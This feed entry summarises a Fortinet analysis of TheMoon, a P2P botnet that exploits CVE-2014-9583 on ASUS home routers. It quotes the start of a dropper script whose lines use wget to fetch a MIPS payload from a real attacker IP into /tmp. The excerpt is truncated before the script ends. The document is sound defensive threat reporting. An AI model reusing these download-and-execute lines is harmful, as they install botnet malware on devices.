Source |
Fortinet |
Identifier |
210657 |
Publication date |
2016-10-20 08:52:50 (viewed: 2016-10-20 08:52:50) |
Title |
TheMoon - A P2P botnet targeting Home Routers |
Text |
In the post “Home Routers - New Favorite of Cybercriminals in 2016”, we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year. In this post we will dissect a bot installed on the affected ASUS routers.
The following figure shows attack traffic captured through Wireshark.
Figure 1 Exploitation of CVE-2014-9583
Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/.
#!/bin/sh
cd /tmp
rm -f .nttpd
wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1
chmod... |
Notes |
|
Sent |
Yes |
Tags |
|
Stories |
|